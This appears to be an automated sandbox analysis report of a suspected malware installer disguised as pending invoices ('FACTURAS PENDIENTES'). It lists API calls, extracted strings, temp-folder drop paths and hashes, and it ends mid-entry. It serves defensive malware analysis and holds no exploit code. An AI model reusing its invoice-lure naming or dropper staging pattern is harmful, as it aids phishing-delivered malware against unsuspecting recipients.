                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                • EnableWindow.USER32(?), ref: 00403E11
                                • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                • GetSysColor.USER32(?), ref: 00403E4A
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                • lstrlenW.KERNEL32(?), ref: 00403E6C
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                • SendMessageW.USER32(00000000), ref: 00403EF3
                                • EnableWindow.USER32(00000000), ref: 00403F10
                                • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                • SetCursor.USER32(00000000), ref: 00403FA4
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                • SetCursor.USER32(00000000), ref: 00403FE9
                                • SendMessageW.USER32(00000111,?,00000000), ref: 00404015
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                • String ID: >5^$Call$N
                                • API String ID: 3270077613-4150751978
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                • BeginPaint.USER32(?,?), ref: 0040104C
                                • GetClientRect.USER32(?,?), ref: 00401062
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                • SetBkMode.GDI32(00000000,?), ref: 00401143
                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                • DrawTextW.USER32(00000000,Tolkningen Setup,000000FF,?,00000820), ref: 00401171
                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                • DeleteObject.GDI32(?), ref: 0040117F
                                • EndPaint.USER32(?,?), ref: 0040118E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F$Tolkningen Setup
                                • API String ID: 941294808-2961945220
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                • wsprintfA.USER32 ref: 00406360
                                • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                • CloseHandle.KERNEL32(00000000), ref: 00406411
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$HfB$HnB$[Rename]
                                • API String ID: 2900126502-165592708
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                • GlobalFree.KERNEL32(?), ref: 00402C7E
                                • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll, xrefs: 00402CD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 2667972263-2928134256
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                Strings
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D18, 00406D1A
                                • *?|<>/":, xrefs: 00406D7C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                • API String ID: 589700163-879122614
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                • GetMessagePos.USER32 ref: 004056D6
                                • ScreenToClient.USER32(?,?), ref: 004056F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                APIs
                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00403648
                                • MulDiv.KERNEL32(000825C8,00000064,000825C8), ref: 00403670
                                • wsprintfW.USER32 ref: 00403680
                                • SetWindowTextW.USER32(?,?), ref: 00403690
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                Strings
                                • verifying installer: %d%%, xrefs: 0040367A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                APIs
                                  • Part of subcall function 6FA412F8: GlobalAlloc.KERNEL32(00000040,?,6FA411C4,-000000A0), ref: 6FA41302
                                • GlobalFree.KERNEL32(00000000), ref: 6FA422F1
                                • GlobalFree.KERNEL32(00000000), ref: 6FA42326
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmp
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FA4116B
                                • GlobalFree.KERNEL32(00000000), ref: 6FA411AE
                                • GlobalFree.KERNEL32(00000000), ref: 6FA411CD
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FA411E6
                                • GlobalFree.KERNEL32 ref: 6FA4125C
                                • GlobalFree.KERNEL32(?), ref: 6FA412A7
                                • GlobalFree.KERNEL32(00000000), ref: 6FA412BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 6FA421BF
                                  • Part of subcall function 6FA412E1: lstrcpynW.KERNEL32(00000000,?,6FA4156A,?,6FA411C4,-000000A0), ref: 6FA412F1
                                • GlobalAlloc.KERNEL32(00000040), ref: 6FA4212C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FA4214C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Similarity
                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                • String ID:
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                APIs
                                • GetDC.USER32 ref: 00401FB9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                • String ID:
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FA42B4C,00000000,00000808), ref: 6FA41F8C
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FA41F97
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FA41FAB
                                • GetProcAddress.KERNEL32(?,00000000), ref: 6FA41FB6
                                • GlobalFree.KERNEL32(00000000), ref: 6FA41FBF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Similarity
                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                • String ID:
                                APIs
                                • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                • wsprintfW.USER32 ref: 00405607
                                • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                APIs
                                • wsprintfW.USER32 ref: 6FA41F51
                                • lstrcpyW.KERNEL32(?,error,00001018,6FA41765,00000000,?), ref: 6FA41F71
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Similarity
                                • API ID: lstrcpywsprintf
                                • String ID: callback%d$error
                                APIs
                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403C9E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406537
                                • CharPrevW.USER32(?,00000000), ref: 00406542
                                • lstrcatW.KERNEL32(?,004082B0), ref: 00406554
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406531
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Similarity
                                • API ID: FreeGlobal$__alldvrm
                                • String ID:
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 004028B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: lstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                APIs
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                  • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                  • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                Strings
                                • @, xrefs: 004020F2
                                • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 004020D1
                                • C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll, xrefs: 00402098
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                • String ID: @$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                APIs
                                • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                                • GetTickCount.KERNEL32 ref: 00403394
                                • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                APIs
                                • IsWindowVisible.USER32(?), ref: 004058DF
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                  • Part of subcall function 004054C3: SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 004054D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                APIs
                                • DispatchMessageW.USER32(?), ref: 004061F6
                                • PeekMessageW.USER32(?,00000000,?,T5@,?), ref: 0040620A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Message$DispatchPeek
                                • String ID: T5@
                                • API String ID: 1770753511-1075436632
                                • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                APIs
                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403433,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00406CF1
                                • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D02
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-1246513382
                                • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction ID: 4dbe35682b60e6d52269d03a3853e7a49c7dcb535e87d19da2916c46be0a3be3
                                • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction Fuzzy Hash: EBD05E31015924DBD7526B18ED099AF7BB8EF0130030A846EE987E3160CB385C9187AD

                                Execution Graph

                                Execution Coverage:0%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:100%
                                Total number of Nodes:1
                                Total number of Limit Nodes:0
                                execution_graph 81953 32522b60 LdrInitializeThunk

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3 325235c0-325235cc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                • Instruction ID: 901f55cd631d95ff1acd2a401f06906f97f833eeec9581b60af63e1ade93d473
                                • Opcode Fuzzy Hash: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                • Instruction Fuzzy Hash: AF90023160650402D10571585618746115547D0211F69D412E1428528D87958B5575A2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 32522b60-32522b6c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                • Instruction ID: d09a84b34bc0d4ec528d12ebb2a41203fd24f572147d881b0132a542c1bf15e1
                                • Opcode Fuzzy Hash: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                • Instruction Fuzzy Hash: 5890026120340003410A71585518756415A47E0211B59D022E2018550DC5258A957125

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1 32522c70-32522c7c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
